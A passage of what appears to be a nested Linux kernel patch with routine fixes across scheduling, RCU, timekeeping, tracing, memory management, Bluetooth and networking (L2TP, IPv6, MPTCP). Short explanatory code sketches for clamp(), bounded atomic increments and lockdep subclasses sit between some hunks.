+-		pr_warn("kernel sleep profiling requires CONFIG_SCHEDSTATS\n");
+-#endif /* CONFIG_SCHEDSTATS */
+-	} else if (!strncmp(str, schedstr, strlen(schedstr))) {
++	if (!strncmp(str, schedstr, strlen(schedstr))) {
+ 		prof_on = SCHED_PROFILING;
+ 		select = schedstr;
+ 	} else if (!strncmp(str, kvmstr, strlen(kvmstr))) {
+diff --git a/kernel/rcu/rcutorture.c b/kernel/rcu/rcutorture.c
+index 8c45df910763a..c14517912cfaa 100644
+--- a/kernel/rcu/rcutorture.c
++++ b/kernel/rcu/rcutorture.c
+@@ -2547,7 +2547,7 @@ static void rcu_torture_fwd_cb_cr(struct rcu_head *rhp)
+ 	spin_lock_irqsave(&rfp->rcu_fwd_lock, flags);
+ 	rfcpp = rfp->rcu_fwd_cb_tail;
+ 	rfp->rcu_fwd_cb_tail = &rfcp->rfc_next;
+-	WRITE_ONCE(*rfcpp, rfcp);
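++	/* Publish the callback with release semantics so that its setup
++	 * is visible before the reader can traverse to it.
++	 */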
++	smp_store_release(rfcpp, rfcp);
+ 	WRITE_ONCE(rfp->n_launders_cb, rfp->n_launders_cb + 1);
+ 	i = ((jiffies - rfp->rcu_fwd_startat) / (HZ / FWD_CBS_HIST_DIV));
+ 	if (i >= ARRAY_SIZE(rfp->n_launders_hist))
+diff --git a/kernel/rcu/tree.c b/kernel/rcu/tree.c
+index 61f9503a5fe9c..cd6144cea5a1a 100644
+--- a/kernel/rcu/tree.c
++++ b/kernel/rcu/tree.c
+@@ -4391,11 +4391,15 @@ void rcutree_migrate_callbacks(int cpu)
+ 	struct rcu_data *rdp = per_cpu_ptr(&rcu_data, cpu);
+ 	bool needwake;
+ 
+-	if (rcu_rdp_is_offloaded(rdp) ||
+-	    rcu_segcblist_empty(&rdp->cblist))
+-		return;  /* No callbacks to migrate. */
++	if (rcu_rdp_is_offloaded(rdp))
++		return;
+ 
+ 	raw_spin_lock_irqsave(&rcu_state.barrier_lock, flags);
++	if (rcu_segcblist_empty(&rdp->cblist)) {
++		raw_spin_unlock_irqrestore(&rcu_state.barrier_lock, flags);
++		return;  /* No callbacks to migrate. */
++	}
++
+ 	WARN_ON_ONCE(rcu_rdp_cpu_online(rdp));
+ 	rcu_barrier_entrain(rdp);
+ 	my_rdp = this_cpu_ptr(&rcu_data);
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index 4a96bf1d2f37c..8388575759378 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -9398,6 +9398,22 @@ static int cpuset_cpu_inactive(unsigned int cpu)
+ 	return 0;
+ }
+ 
++static inline void sched_smt_present_inc(int cpu)
++{
++#ifdef CONFIG_SCHED_SMT
++	if (cpumask_weight(cpu_smt_mask(cpu)) == 2)
++		static_branch_inc_cpuslocked(&sched_smt_present);
++#endif
++}
++
++static inline void sched_smt_present_dec(int cpu)
++{
++#ifdef CONFIG_SCHED_SMT
++	if (cpumask_weight(cpu_smt_mask(cpu)) == 2)
++		static_branch_dec_cpuslocked(&sched_smt_present);
++#endif
++}
++
+ int sched_cpu_activate(unsigned int cpu)
+ {
+ 	struct rq *rq = cpu_rq(cpu);
+@@ -9409,13 +9425,10 @@ int sched_cpu_activate(unsigned int cpu)
+ 	 */
+ 	balance_push_set(cpu, false);
+ 
+-#ifdef CONFIG_SCHED_SMT
+ 	/*
+ 	 * When going up, increment the number of cores with SMT present.
+ 	 */
+-	if (cpumask_weight(cpu_smt_mask(cpu)) == 2)
+-		static_branch_inc_cpuslocked(&sched_smt_present);
+-#endif
++	sched_smt_present_inc(cpu);
+ 	set_cpu_active(cpu, true);
+ 
+ 	if (sched_smp_initialized) {
+@@ -9485,13 +9498,12 @@ int sched_cpu_deactivate(unsigned int cpu)
+ 	}
+ 	rq_unlock_irqrestore(rq, &rf);
+ 
+-#ifdef CONFIG_SCHED_SMT
+ 	/*
+ 	 * When going down, decrement the number of cores with SMT present.
+ 	 */
+-	if (cpumask_weight(cpu_smt_mask(cpu)) == 2)
+-		static_branch_dec_cpuslocked(&sched_smt_present);
++	sched_smt_present_dec(cpu);
+ 
++#ifdef CONFIG_SCHED_SMT
+ 	sched_core_cpu_deactivate(cpu);
+ #endif
+ 
+@@ -9501,6 +9513,7 @@ int sched_cpu_deactivate(unsigned int cpu)
+ 	sched_update_numa(cpu, false);
+ 	ret = cpuset_cpu_inactive(cpu);
+ 	if (ret) {
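++		/* Deactivation failed, restore the SMT accounting. */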
++		sched_smt_present_inc(cpu);
+ 		balance_push_set(cpu, false);
+ 		set_cpu_active(cpu, true);
+ 		sched_update_numa(cpu, true);
+diff --git a/kernel/sched/cputime.c b/kernel/sched/cputime.c
+index 95fc778537434..b55b84f3dd542 100644
+--- a/kernel/sched/cputime.c
++++ b/kernel/sched/cputime.c
+@@ -591,6 +591,12 @@ void cputime_adjust(struct task_cputime *curr, struct prev_cputime *prev,
+ 	}
+ 
+ 	stime = mul_u64_u64_div_u64(stime, rtime, stime + utime);
++	/*
++	 * Because mul_u64_u64_div_u64() can approximate on some
++	 * architectures, enforce the constraint that a*b/(b+c) <= a.
++	 */
++	if (unlikely(stime > rtime))
++		stime = rtime;
+ 
+ update:
+ 	/*
+diff --git a/kernel/sched/stats.c b/kernel/sched/stats.c
+index 857f837f52cbe..966f4eacfe51d 100644
+--- a/kernel/sched/stats.c
++++ b/kernel/sched/stats.c
+@@ -92,16 +92,6 @@ void __update_stats_enqueue_sleeper(struct rq *rq, struct task_struct *p,
+ 
+ 			trace_sched_stat_blocked(p, delta);
+ 
+-			/*
+-			 * Blocking time is in units of nanosecs, so shift by
+-			 * 20 to get a milliseconds-range estimation of the
+-			 * amount of time that the task spent sleeping:
+-			 */
+-			if (unlikely(prof_on == SLEEP_PROFILING)) {
+-				profile_hits(SLEEP_PROFILING,
+-					     (void *)get_wchan(p),
+-					     delta >> 20);
+-			}
+ 			account_scheduler_latency(p, delta >> 10, 0);
+ 		}
+ 	}
+diff --git a/kernel/time/clocksource-wdtest.c b/kernel/time/clocksource-wdtest.c
+index df922f49d171b..d06185e054ea2 100644
+--- a/kernel/time/clocksource-wdtest.c
++++ b/kernel/time/clocksource-wdtest.c
+@@ -104,8 +104,8 @@ static void wdtest_ktime_clocksource_reset(void)
+ static int wdtest_func(void *arg)
+ {
+ 	unsigned long j1, j2;
++	int i, max_retries;
+ 	char *s;
+-	int i;
+ 
+ 	schedule_timeout_uninterruptible(holdoff * HZ);
+ 
+@@ -139,18 +139,19 @@ static int wdtest_func(void *arg)
+ 	WARN_ON_ONCE(time_before(j2, j1 + NSEC_PER_USEC));
+ 
+ 	/* Verify tsc-like stability with various numbers of errors injected. */
+-	for (i = 0; i <= max_cswd_read_retries + 1; i++) {
+-		if (i <= 1 && i < max_cswd_read_retries)
++	max_retries = clocksource_get_max_watchdog_retry();
++	for (i = 0; i <= max_retries + 1; i++) {
++		if (i <= 1 && i < max_retries)
+ 			s = "";
+-		else if (i <= max_cswd_read_retries)
++		else if (i <= max_retries)
+ 			s = ", expect message";
+ 		else
+ 			s = ", expect clock skew";
+-		pr_info("--- Watchdog with %dx error injection, %lu retries%s.\n", i, max_cswd_read_retries, s);
++		pr_info("--- Watchdog with %dx error injection, %d retries%s.\n", i, max_retries, s);
+ 		WRITE_ONCE(wdtest_ktime_read_ndelays, i);
+ 		schedule_timeout_uninterruptible(2 * HZ);
+ 		WARN_ON_ONCE(READ_ONCE(wdtest_ktime_read_ndelays));
+-		WARN_ON_ONCE((i <= max_cswd_read_retries) !=
++		WARN_ON_ONCE((i <= max_retries) !=
+ 			     !(clocksource_wdtest_ktime.flags & CLOCK_SOURCE_UNSTABLE));
+ 		wdtest_ktime_clocksource_reset();
+ 	}
+diff --git a/kernel/time/clocksource.c b/kernel/time/clocksource.c
+index cc6db3bce1b2f..cd9a59011dee9 100644
+--- a/kernel/time/clocksource.c
++++ b/kernel/time/clocksource.c
+@@ -207,9 +207,6 @@ void clocksource_mark_unstable(struct clocksource *cs)
+ 	spin_unlock_irqrestore(&watchdog_lock, flags);
+ }
+ 
+-ulong max_cswd_read_retries = 2;
+-module_param(max_cswd_read_retries, ulong, 0644);
+-EXPORT_SYMBOL_GPL(max_cswd_read_retries);
+ static int verify_n_cpus = 8;
+ module_param(verify_n_cpus, int, 0644);
+ 
+@@ -221,11 +218,12 @@ enum wd_read_status {
+ 
+ static enum wd_read_status cs_watchdog_read(struct clocksource *cs, u64 *csnow, u64 *wdnow)
+ {
+-	unsigned int nretries;
++	unsigned int nretries, max_retries;
+ 	u64 wd_end, wd_end2, wd_delta;
+ 	int64_t wd_delay, wd_seq_delay;
+ 
+-	for (nretries = 0; nretries <= max_cswd_read_retries; nretries++) {
++	max_retries = clocksource_get_max_watchdog_retry();
++	for (nretries = 0; nretries <= max_retries; nretries++) {
+ 		local_irq_disable();
+ 		*wdnow = watchdog->read(watchdog);
+ 		*csnow = cs->read(cs);
+@@ -237,7 +235,7 @@ static enum wd_read_status cs_watchdog_read(struct clocksource *cs, u64 *csnow,
+ 		wd_delay = clocksource_cyc2ns(wd_delta, watchdog->mult,
+ 					      watchdog->shift);
+ 		if (wd_delay <= WATCHDOG_MAX_SKEW) {
+-			if (nretries > 1 || nretries >= max_cswd_read_retries) {
++			if (nretries > 1 && nretries >= max_retries) {
+ 				pr_warn("timekeeping watchdog on CPU%d: %s retried %d times before success\n",
+ 					smp_processor_id(), watchdog->name, nretries);
+ 			}
+diff --git a/kernel/time/ntp.c b/kernel/time/ntp.c
+index 406dccb79c2b6..8d2dd214ec682 100644
+--- a/kernel/time/ntp.c
++++ b/kernel/time/ntp.c
+@@ -727,17 +727,16 @@ static inline void process_adjtimex_modes(const struct __kernel_timex *txc,
+ 	}
+ 
+ 	if (txc->modes & ADJ_MAXERROR)
+-		time_maxerror = txc->maxerror;
++		time_maxerror = clamp(txc->maxerror, 0, NTP_PHASE_LIMIT);
+ 
+ 	if (txc->modes & ADJ_ESTERROR)
+-		time_esterror = txc->esterror;
++		time_esterror = clamp(txc->esterror, 0, NTP_PHASE_LIMIT);
+ 
+ 	if (txc->modes & ADJ_TIMECONST) {
+-		time_constant = txc->constant;
++		time_constant = clamp(txc->constant, 0, MAXTC);
+ 		if (!(time_status & STA_NANO))
+ 			time_constant += 4;
+-		time_constant = min(time_constant, (long)MAXTC);
+-		time_constant = max(time_constant, 0l);
++		time_constant = clamp(time_constant, 0, MAXTC);
+ 	}
+ 
+ 	if (txc->modes & ADJ_TAI &&
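
For reference (an illustration, not part of the patch): clamp() from
<linux/minmax.h> is equivalent to the min()/max() pair it replaces above;
MAXTC comes from <linux/timex.h>.

	static long bound_time_constant(long req)
	{
		/* clamp(v, lo, hi) == min(max(v, lo), hi); e.g. 100000 -> MAXTC. */
		return clamp(req, 0L, (long)MAXTC);
	}
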
+diff --git a/kernel/time/tick-broadcast.c b/kernel/time/tick-broadcast.c
+index ba551ec546f52..13a71a894cc16 100644
+--- a/kernel/time/tick-broadcast.c
++++ b/kernel/time/tick-broadcast.c
+@@ -1137,7 +1137,6 @@ void tick_broadcast_switch_to_oneshot(void)
+ #ifdef CONFIG_HOTPLUG_CPU
+ void hotplug_cpu__broadcast_tick_pull(int deadcpu)
+ {
+-	struct tick_device *td = this_cpu_ptr(&tick_cpu_device);
+ 	struct clock_event_device *bc;
+ 	unsigned long flags;
+ 
+@@ -1163,6 +1162,8 @@ void hotplug_cpu__broadcast_tick_pull(int deadcpu)
+ 		 * device to avoid the starvation.
+ 		 */
+ 		if (tick_check_broadcast_expired()) {
++			struct tick_device *td = this_cpu_ptr(&tick_cpu_device);
++
+ 			cpumask_clear_cpu(smp_processor_id(), tick_broadcast_force_mask);
+ 			tick_program_event(td->evtdev->next_event, 1);
+ 		}
+diff --git a/kernel/time/timekeeping.c b/kernel/time/timekeeping.c
+index b158cbef4d8dc..8ac43afc11f96 100644
+--- a/kernel/time/timekeeping.c
++++ b/kernel/time/timekeeping.c
+@@ -2476,7 +2476,7 @@ int do_adjtimex(struct __kernel_timex *txc)
+ 		clock_set |= timekeeping_advance(TK_ADV_FREQ);
+ 
+ 	if (clock_set)
+-		clock_was_set(CLOCK_REALTIME);
++		clock_was_set(CLOCK_SET_WALL);
+ 
+ 	ntp_notify_cmos_timer();
+ 
+diff --git a/kernel/trace/tracing_map.c b/kernel/trace/tracing_map.c
+index a4dcf0f243521..3a56e7c8aa4f6 100644
+--- a/kernel/trace/tracing_map.c
++++ b/kernel/trace/tracing_map.c
+@@ -454,7 +454,7 @@ static struct tracing_map_elt *get_free_elt(struct tracing_map *map)
+ 	struct tracing_map_elt *elt = NULL;
+ 	int idx;
+ 
+-	idx = atomic_inc_return(&map->next_elt);
++	idx = atomic_fetch_add_unless(&map->next_elt, 1, map->max_elts);
+ 	if (idx < map->max_elts) {
+ 		elt = *(TRACING_MAP_ELT(map->elts, idx));
+ 		if (map->ops && map->ops->elt_init)
+@@ -699,7 +699,7 @@ void tracing_map_clear(struct tracing_map *map)
+ {
+ 	unsigned int i;
+ 
+-	atomic_set(&map->next_elt, -1);
++	atomic_set(&map->next_elt, 0);
+ 	atomic64_set(&map->hits, 0);
+ 	atomic64_set(&map->drops, 0);
+ 
+@@ -783,7 +783,7 @@ struct tracing_map *tracing_map_create(unsigned int map_bits,
+ 
+ 	map->map_bits = map_bits;
+ 	map->max_elts = (1 << map_bits);
+-	atomic_set(&map->next_elt, -1);
++	atomic_set(&map->next_elt, 0);
+ 
+ 	map->map_size = (1 << (map_bits + 1));
+ 	map->ops = ops;
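
A hedged sketch of the bounded-increment pattern used above (standalone
illustration, not part of the patch): atomic_fetch_add_unless() returns the
old value and skips the add once the limit is reached, so next_elt can no
longer wrap past max_elts after repeated failed lookups.

	/* Hands out 0 .. limit - 1 exactly once; returns limit when full. */
	static int grab_slot(atomic_t *next, int limit)
	{
		return atomic_fetch_add_unless(next, 1, limit);
	}
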
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index 1b7f5950d6037..f97b221fb6567 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -608,7 +608,7 @@ static unsigned long __thp_get_unmapped_area(struct file *filp,
+ 	loff_t off_align = round_up(off, size);
+ 	unsigned long len_pad, ret;
+ 
+-	if (IS_ENABLED(CONFIG_32BIT) || in_compat_syscall())
++	if (!IS_ENABLED(CONFIG_64BIT) || in_compat_syscall())
+ 		return 0;
+ 
+ 	if (off_end <= off_align || (off_end - off_align) < size)
+diff --git a/mm/hugetlb.c b/mm/hugetlb.c
+index 05b8797163b2b..14b9494c58ede 100644
+--- a/mm/hugetlb.c
++++ b/mm/hugetlb.c
+@@ -1785,13 +1785,6 @@ static void __update_and_free_page(struct hstate *h, struct page *page)
+ 		return;
+ 	}
+ 
+-	/*
+-	 * Move PageHWPoison flag from head page to the raw error pages,
+-	 * which makes any healthy subpages reusable.
+-	 */
+-	if (unlikely(PageHWPoison(page)))
+-		hugetlb_clear_page_hwpoison(page);
+-
+ 	/*
+ 	 * If vmemmap pages were allocated above, then we need to clear the
+ 	 * hugetlb destructor under the hugetlb lock.
+@@ -1802,6 +1795,13 @@ static void __update_and_free_page(struct hstate *h, struct page *page)
+ 		spin_unlock_irq(&hugetlb_lock);
+ 	}
+ 
++	/*
++	 * Move PageHWPoison flag from head page to the raw error pages,
++	 * which makes any healthy subpages reusable.
++	 */
++	if (unlikely(PageHWPoison(page)))
++		hugetlb_clear_page_hwpoison(page);
++
+ 	for (i = 0; i < pages_per_huge_page(h); i++) {
+ 		subpage = nth_page(page, i);
+ 		subpage->flags &= ~(1 << PG_locked | 1 << PG_error |
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 320fc1e6dff2a..3d6a22812b498 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -2880,6 +2880,20 @@ static int hci_passive_scan_sync(struct hci_dev *hdev)
+ 	} else if (hci_is_adv_monitoring(hdev)) {
+ 		window = hdev->le_scan_window_adv_monitor;
+ 		interval = hdev->le_scan_int_adv_monitor;
++
++		/* Disable the duplicates filter when scanning for an
++		 * advertisement monitor, for the following reasons.
++		 *
++		 * For HW pattern filtering (ex. MSFT), Realtek and Qualcomm
++		 * controllers ignore RSSI_Sampling_Period when the duplicates
++		 * filter is enabled.
++		 *
++		 * For SW pattern filtering, when we're not doing interleaved
++		 * scanning, it is necessary to disable the duplicates filter;
++		 * otherwise hosts can only receive one advertisement and it's
++		 * impossible to know if a peer is still in range.
++		 */
++		filter_dups = LE_SCAN_FILTER_DUP_DISABLE;
+ 	} else {
+ 		window = hdev->le_scan_window;
+ 		interval = hdev->le_scan_interval;
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index 98dabbbe42938..209c6d458d336 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -7811,6 +7811,7 @@ static void l2cap_conless_channel(struct l2cap_conn *conn, __le16 psm,
+ 	bt_cb(skb)->l2cap.psm = psm;
+ 
+ 	if (!chan->ops->recv(chan, skb)) {
++		l2cap_chan_unlock(chan);
+ 		l2cap_chan_put(chan);
+ 		return;
+ 	}
+diff --git a/net/bridge/br_multicast.c b/net/bridge/br_multicast.c
+index 9765f9f9bf7ff..3cd2b648408d6 100644
+--- a/net/bridge/br_multicast.c
++++ b/net/bridge/br_multicast.c
+@@ -1890,16 +1890,14 @@ void br_multicast_del_port(struct net_bridge_port *port)
+ {
+ 	struct net_bridge *br = port->br;
+ 	struct net_bridge_port_group *pg;
+-	HLIST_HEAD(deleted_head);
+ 	struct hlist_node *n;
+ 
+ 	/* Take care of the remaining groups, only perm ones should be left */
+ 	spin_lock_bh(&br->multicast_lock);
+ 	hlist_for_each_entry_safe(pg, n, &port->mglist, mglist)
+ 		br_multicast_find_del_pg(br, pg);
+-	hlist_move_list(&br->mcast_gc_list, &deleted_head);
+ 	spin_unlock_bh(&br->multicast_lock);
+-	br_multicast_gc(&deleted_head);
++	flush_work(&br->mcast_gc_work);
+ 	br_multicast_port_ctx_deinit(&port->multicast_ctx);
+ 	free_percpu(port->mcast_stats);
+ }
+diff --git a/net/core/link_watch.c b/net/core/link_watch.c
+index 13513efcfbfe8..cdabced98b116 100644
+--- a/net/core/link_watch.c
++++ b/net/core/link_watch.c
+@@ -139,9 +139,9 @@ static void linkwatch_schedule_work(int urgent)
+ 	 * override the existing timer.
+ 	 */
+ 	if (test_bit(LW_URGENT, &linkwatch_flags))
+-		mod_delayed_work(system_wq, &linkwatch_work, 0);
++		mod_delayed_work(system_unbound_wq, &linkwatch_work, 0);
+ 	else
+-		schedule_delayed_work(&linkwatch_work, delay);
++		queue_delayed_work(system_unbound_wq, &linkwatch_work, delay);
+ }
+ 
+ 
+diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
+index fb26401950e7e..df79044fbf3c4 100644
+--- a/net/ipv6/ip6_output.c
++++ b/net/ipv6/ip6_output.c
+@@ -1120,6 +1120,7 @@ static int ip6_dst_lookup_tail(struct net *net, const struct sock *sk,
+ 		from = rt ? rcu_dereference(rt->from) : NULL;
+ 		err = ip6_route_get_saddr(net, from, &fl6->daddr,
+ 					  sk ? inet6_sk(sk)->srcprefs : 0,
++					  fl6->flowi6_l3mdev,
+ 					  &fl6->saddr);
+ 		rcu_read_unlock();
+ 
+diff --git a/net/ipv6/route.c b/net/ipv6/route.c
+index 151414e9f7fe4..8c1d9e6124363 100644
+--- a/net/ipv6/route.c
++++ b/net/ipv6/route.c
+@@ -5681,7 +5681,7 @@ static int rt6_fill_node(struct net *net, struct sk_buff *skb,
+ 				goto nla_put_failure;
+ 	} else if (dest) {
+ 		struct in6_addr saddr_buf;
+-		if (ip6_route_get_saddr(net, rt, dest, 0, &saddr_buf) == 0 &&
++		if (ip6_route_get_saddr(net, rt, dest, 0, 0, &saddr_buf) == 0 &&
+ 		    nla_put_in6_addr(skb, RTA_PREFSRC, &saddr_buf))
+ 			goto nla_put_failure;
+ 	}
+diff --git a/net/l2tp/l2tp_core.c b/net/l2tp/l2tp_core.c
+index 8d21ff25f1602..70da78ab95202 100644
+--- a/net/l2tp/l2tp_core.c
++++ b/net/l2tp/l2tp_core.c
+@@ -88,6 +88,11 @@
+ /* Default trace flags */
+ #define L2TP_DEFAULT_DEBUG_FLAGS	0
+ 
++#define L2TP_DEPTH_NESTING		2
++#if L2TP_DEPTH_NESTING == SINGLE_DEPTH_NESTING
++#error "L2TP requires its own lockdep subclass"
++#endif
++
+ /* Private data stored for received packets in the skb.
+  */
+ struct l2tp_skb_cb {
+@@ -1041,7 +1046,13 @@ static int l2tp_xmit_core(struct l2tp_session *session, struct sk_buff *skb, uns
+ 	IPCB(skb)->flags &= ~(IPSKB_XFRM_TUNNEL_SIZE | IPSKB_XFRM_TRANSFORMED | IPSKB_REROUTED);
+ 	nf_reset_ct(skb);
+ 
+-	bh_lock_sock_nested(sk);
++	/* L2TP uses its own lockdep subclass to avoid lockdep splats caused by
++	 * nested socket calls on the same lockdep socket class. This can
++	 * happen when data from a user socket is routed over l2tp, which uses
++	 * another userspace socket.
++	 */
++	spin_lock_nested(&sk->sk_lock.slock, L2TP_DEPTH_NESTING);
++
+ 	if (sock_owned_by_user(sk)) {
+ 		kfree_skb(skb);
+ 		ret = NET_XMIT_DROP;
+@@ -1093,7 +1104,7 @@ static int l2tp_xmit_core(struct l2tp_session *session, struct sk_buff *skb, uns
+ 	ret = l2tp_xmit_queue(tunnel, skb, &inet->cork.fl);
+ 
+ out_unlock:
+-	bh_unlock_sock(sk);
++	spin_unlock(&sk->sk_lock.slock);
+ 
+ 	return ret;
+ }
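
A minimal sketch of the lockdep-subclass idea used above (illustrative, not
part of the patch; subclass 2 mirrors L2TP_DEPTH_NESTING): two locks of the
same class acquired with different subclasses do not trigger lockdep's
recursive-locking report.

	static void nested_pair(spinlock_t *outer, spinlock_t *inner)
	{
		spin_lock(outer);		/* default subclass 0 */
		spin_lock_nested(inner, 2);	/* L2TP_DEPTH_NESTING */
		spin_unlock(inner);
		spin_unlock(outer);
	}
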
+diff --git a/net/mptcp/mib.c b/net/mptcp/mib.c
+index 0dac2863c6e1e..1f3161a38b9d2 100644
+--- a/net/mptcp/mib.c
++++ b/net/mptcp/mib.c
+@@ -19,7 +19,9 @@ static const struct snmp_mib mptcp_snmp_list[] = {
+ 	SNMP_MIB_ITEM("MPTCPRetrans", MPTCP_MIB_RETRANSSEGS),
+ 	SNMP_MIB_ITEM("MPJoinNoTokenFound", MPTCP_MIB_JOINNOTOKEN),
+ 	SNMP_MIB_ITEM("MPJoinSynRx", MPTCP_MIB_JOINSYNRX),
++	SNMP_MIB_ITEM("MPJoinSynBackupRx", MPTCP_MIB_JOINSYNBACKUPRX),
+ 	SNMP_MIB_ITEM("MPJoinSynAckRx", MPTCP_MIB_JOINSYNACKRX),
++	SNMP_MIB_ITEM("MPJoinSynAckBackupRx", MPTCP_MIB_JOINSYNACKBACKUPRX),
+ 	SNMP_MIB_ITEM("MPJoinSynAckHMacFailure", MPTCP_MIB_JOINSYNACKMAC),
+ 	SNMP_MIB_ITEM("MPJoinAckRx", MPTCP_MIB_JOINACKRX),
+ 	SNMP_MIB_ITEM("MPJoinAckHMacFailure", MPTCP_MIB_JOINACKMAC),
+diff --git a/net/mptcp/mib.h b/net/mptcp/mib.h
+index 2be3596374f4e..a7b94f5c5d277 100644
+--- a/net/mptcp/mib.h
++++ b/net/mptcp/mib.h
+@@ -12,7 +12,9 @@ enum linux_mptcp_mib_field {
+ 	MPTCP_MIB_RETRANSSEGS,		/* Segments retransmitted at the MPTCP-level */
+ 	MPTCP_MIB_JOINNOTOKEN,		/* Received MP_JOIN but the token was not found */
+ 	MPTCP_MIB_JOINSYNRX,		/* Received a SYN + MP_JOIN */
++	MPTCP_MIB_JOINSYNBACKUPRX,	/* Received a SYN + MP_JOIN + backup flag */
+ 	MPTCP_MIB_JOINSYNACKRX,		/* Received a SYN/ACK + MP_JOIN */
++	MPTCP_MIB_JOINSYNACKBACKUPRX,	/* Received a SYN/ACK + MP_JOIN + backup flag */
+ 	MPTCP_MIB_JOINSYNACKMAC,	/* HMAC was wrong on SYN/ACK + MP_JOIN */
+ 	MPTCP_MIB_JOINACKRX,		/* Received an ACK + MP_JOIN */
+ 	MPTCP_MIB_JOINACKMAC,		/* HMAC was wrong on ACK + MP_JOIN */
+diff --git a/net/mptcp/pm.c b/net/mptcp/pm.c
+index 10c288a0cb0c2..a27ee627addef 100644
+--- a/net/mptcp/pm.c
++++ b/net/mptcp/pm.c
+@@ -416,6 +416,18 @@ int mptcp_pm_get_local_id(struct mptcp_sock *msk, struct sock_common *skc)
+ 	return mptcp_pm_nl_get_local_id(msk, skc);
+ }
+ 
++bool mptcp_pm_is_backup(struct mptcp_sock *msk, struct sock_common *skc)
++{
++	struct mptcp_addr_info skc_local;
++
++	mptcp_local_address((struct sock_common *)skc, &skc_local);
++
++	if (mptcp_pm_is_userspace(msk))
++		return mptcp_userspace_pm_is_backup(msk, &skc_local);
++
++	return mptcp_pm_nl_is_backup(msk, &skc_local);
++}
++
+ void mptcp_pm_subflow_chk_stale(const struct mptcp_sock *msk, struct sock *ssk)
+ {
+ 	struct mptcp_subflow_context *subflow = mptcp_subflow_ctx(ssk);
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index e9dff63825817..2b5a5680f09ac 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -86,8 +86,7 @@ bool mptcp_addresses_equal(const struct mptcp_addr_info *a,
+ 	return a->port == b->port;
+ }
+ 
+-static void local_address(const struct sock_common *skc,
+-			  struct mptcp_addr_info *addr)
++void mptcp_local_address(const struct sock_common *skc, struct mptcp_addr_info *addr)
+ {
+ 	addr->family = skc->skc_family;
+ 	addr->port = htons(skc->skc_num);
+@@ -122,7 +121,7 @@ static bool lookup_subflow_by_saddr(const struct list_head *list,
+ 	list_for_each_entry(subflow, list, node) {
+ 		skc = (struct sock_common *)mptcp_subflow_tcp_sock(subflow);
+ 
+-		local_address(skc, &cur);
++		mptcp_local_address(skc, &cur);
+ 		if (mptcp_addresses_equal(&cur, saddr, saddr->port))
+ 			return true;
+ 	}
+@@ -274,7 +273,7 @@ bool mptcp_pm_sport_in_anno_list(struct mptcp_sock *msk, const struct sock *sk)
+ 	struct mptcp_addr_info saddr;
+ 	bool ret = false;
+ 
+-	local_address((struct sock_common *)sk, &saddr);
++	mptcp_local_address((struct sock_common *)sk, &saddr);
+ 
+ 	spin_lock_bh(&msk->pm.lock);
+ 	list_for_each_entry(entry, &msk->pm.anno_list, list) {
+@@ -545,7 +544,7 @@ static void mptcp_pm_create_subflow_or_signal_addr(struct mptcp_sock *msk)
+ 		struct mptcp_addr_info mpc_addr;
+ 		bool backup = false;
+ 
+-		local_address((struct sock_common *)msk->first, &mpc_addr);
++		mptcp_local_address((struct sock_common *)msk->first, &mpc_addr);
+ 		rcu_read_lock();
+ 		entry = __lookup_addr(pernet, &mpc_addr, false);
+ 		if (entry) {
+@@ -753,7 +752,7 @@ int mptcp_pm_nl_mp_prio_send_ack(struct mptcp_sock *msk,
+ 		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
+ 		struct mptcp_addr_info local, remote;
+ 
+-		local_address((struct sock_common *)ssk, &local);
++		mptcp_local_address((struct sock_common *)ssk, &local);
+ 		if (!mptcp_addresses_equal(&local, addr, addr->port))
+ 			continue;
+ 
+@@ -1072,8 +1071,8 @@ int mptcp_pm_nl_get_local_id(struct mptcp_sock *msk, struct sock_common *skc)
+ 	/* The 0 ID mapping is defined by the first subflow, copied into the msk
+ 	 * addr
+ 	 */
+-	local_address((struct sock_common *)msk, &msk_local);
+-	local_address((struct sock_common *)skc, &skc_local);
++	mptcp_local_address((struct sock_common *)msk, &msk_local);
++	mptcp_local_address((struct sock_common *)skc, &skc_local);
+ 	if (mptcp_addresses_equal(&msk_local, &skc_local, false))
+ 		return 0;
+ 
+@@ -1111,6 +1110,24 @@ int mptcp_pm_nl_get_local_id(struct mptcp_sock *msk, struct sock_common *skc)
+ 	return ret;
+ }
+ 
++bool mptcp_pm_nl_is_backup(struct mptcp_sock *msk, struct mptcp_addr_info *skc)
++{
++	struct pm_nl_pernet *pernet = pm_nl_get_pernet_from_msk(msk);
++	struct mptcp_pm_addr_entry *entry;
++	bool backup = false;
++
++	rcu_read_lock();
++	list_for_each_entry_rcu(entry, &pernet->local_addr_list, list) {
++		if (mptcp_addresses_equal(&entry->addr, skc, entry->addr.port)) {
++			backup = !!(entry->flags & MPTCP_PM_ADDR_FLAG_BACKUP);
++			break;
++		}
++	}
++	rcu_read_unlock();
++
++	return backup;
++}
++
+ #define MPTCP_PM_CMD_GRP_OFFSET       0
+ #define MPTCP_PM_EV_GRP_OFFSET        1
+ 
+@@ -1343,8 +1360,8 @@ static int mptcp_nl_cmd_add_addr(struct sk_buff *skb, struct genl_info *info)
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	if (addr.addr.port && !(addr.flags & MPTCP_PM_ADDR_FLAG_SIGNAL)) {
+-		GENL_SET_ERR_MSG(info, "flags must have signal when using port");
++	if (addr.addr.port && !address_use_port(&addr)) {
++		GENL_SET_ERR_MSG(info, "flags must have signal and not subflow when using port");
+ 		return -EINVAL;
+ 	}
+ 
+@@ -1507,7 +1524,7 @@ static int mptcp_nl_remove_id_zero_address(struct net *net,
+ 		if (list_empty(&msk->conn_list) || mptcp_pm_is_userspace(msk))
+ 			goto next;
+ 
+-		local_address((struct sock_common *)msk, &msk_local);
++		mptcp_local_address((struct sock_common *)msk, &msk_local);
+ 		if (!mptcp_addresses_equal(&msk_local, addr, addr->port))
